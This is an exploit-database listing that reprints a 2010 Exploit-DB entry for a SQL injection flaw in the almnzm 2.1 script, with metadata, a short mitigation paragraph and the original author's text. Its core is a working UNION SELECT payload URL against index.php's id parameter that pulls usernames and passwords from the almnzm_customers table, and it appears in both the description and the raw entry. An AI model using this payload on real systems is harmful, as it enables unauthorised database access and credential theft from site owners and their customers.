almnzm 2.1 - exploit.company

vendor:

almnzm

by:

NeX HaCkEr

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: almnzm

Affected Version From: 2.1

Affected Version To: 2.1

Patch Exists: NO

Related CWE: N/A

CPE: almnzm

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

almnzm 2.1 <= SQL Injection Vulnerability

An attacker can exploit this vulnerability by injecting malicious SQL queries into the vulnerable parameter of the application. This can be done by appending a malicious SQL query to the vulnerable parameter of the application. For example, an attacker can append a malicious SQL query to the vulnerable parameter of the application by using the following URL: index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers--%20

Mitigation:

Input validation should be used to prevent malicious SQL queries from being injected into the vulnerable parameter of the application. Additionally, the application should be configured to use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Title: almnzm 2.1 <= SQL Injection Vulnerability
# Author: NeX HaCkEr
# Published: 2010-04-14
# Contact= error_log@hotmail.com
#Script site :http://www.almnzm.com




[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]
>> #1 Vulnerability
Type = SQL Injection
Example URL = index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers--%20


[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]




[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]
>> Greetz
= Dr.DaShEr, DaMI, dr.kasber, RmZ AlJnooP =
[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::]